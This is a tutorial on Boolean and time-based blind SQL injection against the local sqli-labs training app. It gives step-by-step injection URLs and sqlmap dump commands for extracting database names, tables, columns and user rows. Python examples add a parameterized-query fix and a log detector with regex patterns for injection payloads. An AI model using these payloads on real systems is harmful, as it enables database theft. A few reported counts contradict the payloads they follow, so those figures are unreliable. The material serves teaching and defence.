Blind SQL injection
Contents
- Blind injection principle
- Boolean blind injection
- Time blind injection
- sqlmap blind injection
1, Blind injection principle
1. Blind injection application scenario
Blind injection is used where the application gives no detailed echo of the database result. Boolean-based blind injection infers data from whether the page returns its normal or abnormal (true/false) response; time-based blind injection infers data from the delay introduced by sleep().
2. Analysis of blind injection statements
A typical Boolean blind injection statement: select id, username, password from users where id='1' and length(database())=8
The key is the and: for the whole condition to be true, both sides must be true. So when the right-hand side length(database())=x holds, the normal page is returned; when it does not hold, the error page is returned. Boolean blind injection is blind injection based on this true/false distinction.
3. Blind injection source code analysis
Look at the source code of level 8 (Less-8) of sqli-labs-master.
mysql_query function: executes a MySQL query
mysql_fetch_array function: fetches a row from the result set as an associative array, a numeric array, or both
The main logic is to take the GET variable $id and execute the SQL statement: "SELECT * FROM users WHERE id='$id' LIMIT 0,1"
Then an if judgment follows: if the query returns a row, the page prints "You are in"; if it returns nothing, the page prints nothing. In other words, a true condition gives "You are in" and a false condition gives no output.
4. Common functions of blind injection
length() returns the number of characters in a string
ascii() converts the specified character to its ASCII code
mid(data,start,length) extracts a substring of the given length starting at position start
sleep() delays the response by the given number of seconds
count() returns the number of rows
if() conditional expression
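As an added illustration (not code from sqli-labs or from the original write-up), the following Python reproduces the Less-8 pattern against an in-memory SQLite table and shows why splicing the GET value into the SQL text creates a true/false oracle while a bound parameter does not. SQLite stands in for MySQL here, so MySQL-only functions such as database() are not available, and the table contents are constructed.

```python
import sqlite3

# Constructed stand-in for the sqli-labs "users" table (SQLite instead of MySQL).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")

def lookup_vulnerable(user_id: str) -> bool:
    """Mirrors the Less-8 pattern: the GET value is spliced into the SQL text.
    Returns True when a row comes back (the page would print 'You are in')."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone() is not None

def lookup_hardened(user_id: str) -> bool:
    """Same lookup with a bound parameter: the value is data, never SQL syntax."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone() is not None

def oracle_leaks(lookup) -> bool:
    """A Boolean oracle exists when a true and a false injected condition
    produce different page outcomes (the ?id=1' and 1=1 / 1=2 probe above)."""
    return lookup("1' and 1=1-- -") != lookup("1' and 1=2-- -")

if __name__ == "__main__":
    print("legitimate id works in both:", lookup_vulnerable("1"), lookup_hardened("1"))
    print("vulnerable oracle leaks:", oracle_leaks(lookup_vulnerable))   # True
    print("hardened oracle leaks:  ", oracle_leaks(lookup_hardened))     # False
```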
2, Boolean blind injection
Target: sqli-labs-master, level 8 (Less-8)
1. Find the injection point
?id=1' and 1=1-- - returns the normal page; ?id=1' and 1=2-- - returns the error page
2. Query database
(1) Query the number of characters in the database name
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8-- -
The database name is 8 characters long
(2) Query the first character of database name
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(mid(database(),1,1))=115-- -
By the ASCII code, the first character is s
ASCII reference: ASCII code list / ASCII comparison table (biancheng.net)
The remaining characters can be brute-forced directly with Burp Intruder
Burp brute-forcing steps:
1) Set up the proxy and intercept the request
2) Send it to Intruder (shortcut Ctrl+I)
3) Mark the payload positions (the variables)
4) Select Payloads and configure the dictionaries for the first parameter (the character position) and the second parameter (the ASCII value)
5) Start the attack and pick out the requests whose response contains the echo
From the positions and ASCII values it is easy to conclude that the database name is security
3. Query data tables
(1) Query the number of tables
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- -
The security database has 5 tables
(2) Query the number of characters in the first table name
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6-- -
The first table name is 6 characters long
(3) Query the first character of the first table
The other characters are obtained by changing the start position of mid(); the other tables by changing the offset in limit. The users table is found to exist.
4. Query fields
(1) Query the number of fields in the users table
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema='security')=3-- -
The query shows that there are three fields in the users table
(2) Query the number of characters in the first field name
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=2-- -
So the first field name is 2 characters long
(3) Query the first character of the first field
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((column_name),1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=105-- -
The first character of the first field is i
Similarly, the second character is d; the second field is username; the third field is password
5. Query data
(1) Query the number of characters in the data
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(concat(id,0x7e,username,0x7e,password)) from users limit 0,1)=11-- -
The first row (id~username~password) is 11 characters long
(2) Query the data characters
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((concat(id,0x7e,username,0x7e,password)),1,1)) from users limit 0,1)=49-- -
The first character is 1
Repeating the steps above recovers all the data
3, Time blind injection
Target: sqli-labs-master, level 9 (Less-9)
The only difference between time-based and Boolean-based blind injection: Boolean blind injection judges true/false from the echo; time blind injection judges true/false from the response delay
1. Find the injection point
Two features of MySQL are worth noting:
when a numeric column is compared with a string, MySQL matches on the leading number of the string, and any non-digit characters that follow it are ignored (this applies to numeric columns only)
In level 9, whatever value is entered, the page returns the same fixed content; so Boolean blind injection cannot be used, and only time-based blind injection can confirm the injection point
With ?id=1' and if(1=1,sleep(0),sleep(5))-- - the response is fast (about 2 s); with ?id=1' and if(1=2,sleep(0),sleep(5))-- - the response is slow (about 7 s)
So there is an injection point, and the closing character is a single quote (')
2. Query database
(1) Query the number of characters in the database name
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(database()))=8,sleep(5),sleep(0))-- -
When compared with 8 the delay is long, so the database name is 8 characters long
(2) Query the first character of the database name
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(database(),1,1)))=115,sleep(5),sleep(0))-- -
When the ASCII code of the first character is 115 the delay is long, so the first character of the database name is s
Then, by changing the start position of mid() in the same way, the database name security is recovered
3. Query tables
(1) Query the number of tables in security
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),sleep(0))-- -
When the count is 4 the delay is long, so there are four tables in the security database
(2) Query the number of characters in the first table name
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6,sleep(5),sleep(0))-- -
When the length is 6 the delay is long, so the first table name is 6 characters long
(3) Query the first character of the first table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid((table_name),1,1)) from information_schema.tables where table_schema='security' limit 0,1)=101,sleep(5),sleep(0))-- -
When the ASCII code of the first character is 101 the delay is long, so the first character of the first table is e
Following the same query pattern, the users table is found among the four tables
4. Query fields
(1) Query the number of fields in the users table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where table_name='users' and table_schema='security')=3,sleep(5),sleep(0))-- -
The query shows that there are 5 fields in the users table
(2) Query the number of characters in the first field of the users table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=2,sleep(5),sleep(0))-- -
The first field name is 2 characters long
(3) Query the first character of the first field
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(column_name,1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=105,sleep(5),sleep(0))-- -
The first character of the first field is i
Following the same routine, all the fields can be obtained: id, username, password
5. Query data
(1) Query the number of characters in the first row of data
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(concat(id,0x7e,username,0x7e,password)) from users limit 0,1)=11,sleep(5),sleep(0))-- -
This shows that the combination id~username~password in the first row is 11 characters long
(2) Query the first character of the first row
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(concat(id,0x7e,username,0x7e,password),1,1)) from users limit 0,1)=49,sleep(5),sleep(0))-- -
The first character of the first row is 1
All the characters of the first row are: 1~Dumb~Dumb
4, sqlmap blind injection
1. Common sqlmap parameters
-u specifies the URL
-p specifies the parameter to inject
-D specifies the database name
-T specifies the table name
-C specifies the column name
--dbs lists all database names
--current-db queries the current database name
--tables lists all tables
--columns lists all columns
--batch answers every prompt with the default (non-interactive)
-r specifies the path to a request file captured with Burp (suitable for POST requests, requests carrying a cookie, and targets that need no authentication)
--forms automatically identifies POST form parameters; suitable for URLs that do not require login, otherwise add the cookie manually
--cookie specifies a cookie
--technique Q specifies inline query injection
--technique B specifies Boolean-based blind injection
--technique T specifies time-based blind injection
2. sqlmap Boolean blind injection
Target: sqli-labs-master, level 8 (Less-8)
Attacker: 127.0.0.1
(1) Check whether an injection point exists
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --batch
The result shows that the id parameter is injectable via Boolean-based blind injection
(2) Query current database name
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --current-db --batch
(3) Query table names
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security --tables --batch
(4) Query field names
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users --columns --batch
(5) Query data
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users -C username --dump --batch
3. sqlmap time blind injection
Target: sqli-labs-master, level 9 (Less-9)
Time blind injection is run the same way as the Boolean case, except that --technique B is replaced with --technique T
(1) Check whether an injection point exists
(omitted)
(2) Query the database name
(omitted)
(3) Query table names
(omitted)
(4) Query field names
(omitted)
(5) Query data
sqlmap -u "127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T -D security -T users -C username --dump --batch
Time-based injection is slow and the wait is long, but given enough time it succeeds
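Seen from the server side, the manual payloads in the Boolean and time-based sections and the sqlmap runs above all leave a recognisable trace in the web server access log. The following Python is an added detection example (not part of the original write-up or of sqlmap): it parses constructed Apache combined-format lines with the response time in microseconds (%D) appended as the last field (an assumed log format), flags the payload fragments this write-up uses, correlates sleep() payloads with slow responses, notes the sqlmap user-agent, and lists sources that issue many such requests, since blind extraction costs one request per character.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log: combined format plus %D (response time in microseconds) as last field.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs-master/Less-8/?id=1 HTTP/1.1" 200 713 "-" "Mozilla/5.0" 1820
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20length(database())=8--%20- HTTP/1.1" 200 713 "-" "Mozilla/5.0" 1910
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ascii(mid(database(),1,1))=115--%20- HTTP/1.1" 200 713 "-" "Mozilla/5.0" 1874
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs-master/Less-9/?id=1%27%20and%20if((select%20length(database()))=8,sleep(5),sleep(0))--%20- HTTP/1.1" 200 713 "-" "Mozilla/5.0" 5012345
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /sqli-labs-master/Less-9/?id=1 HTTP/1.1" 200 713 "-" "sqlmap/1.7 (https://sqlmap.org)" 1800
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)" (\d+)$')
# Fragments used by the Boolean and time-based payloads walked through in this write-up.
BLIND_SQLI_RE = re.compile(
    r"information_schema|sleep\s*\(|length\s*\(\s*database\s*\(\)|ascii\s*\(\s*mid\s*\(|'\s*and\s+1\s*=\s*[12]",
    re.I)
SLOW_US = 4_000_000  # 4 s: far above the ~2 ms baseline, in the range of the sleep(5) probes

def analyse(log_text: str) -> list[dict]:
    """Return one finding per suspicious request, with the reasons it was flagged."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        ip, method, target, status, ua, micros = m.groups()
        query = unquote_plus(target)  # payloads arrive URL-encoded (%27 -> ')
        reasons = []
        if BLIND_SQLI_RE.search(query):
            reasons.append("blind-sqli payload fragment")
        if int(micros) >= SLOW_US and re.search(r"sleep\s*\(", query, re.I):
            reasons.append("sleep() payload with slow response (time-based oracle)")
        if "sqlmap" in ua.lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append({"ip": ip, "target": query, "reasons": reasons})
    return findings

def noisy_sources(findings: list[dict], threshold: int = 3) -> list[str]:
    """IPs with at least `threshold` flagged requests: one request per character adds up fast."""
    counts = Counter(f["ip"] for f in findings)
    return [ip for ip, n in counts.items() if n >= threshold]

if __name__ == "__main__":
    hits = analyse(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["reasons"], h["target"])
    print("noisy sources:", noisy_sources(hits))
```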